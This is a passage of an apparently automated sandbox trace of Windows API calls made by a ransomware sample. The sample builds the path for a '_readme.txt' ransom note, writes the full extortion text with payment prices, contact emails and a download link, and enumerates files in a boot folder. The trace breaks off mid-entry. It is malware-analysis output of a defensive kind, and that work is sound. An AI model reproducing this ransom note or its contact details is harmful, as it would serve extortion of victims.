(pszPath="") returned="" [0228.500] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.500] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.500] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.500] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.500] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0228.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.500] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0228.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.501] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.501] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.501] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.501] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.502] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.502] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.502] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.502] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.502] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.507] 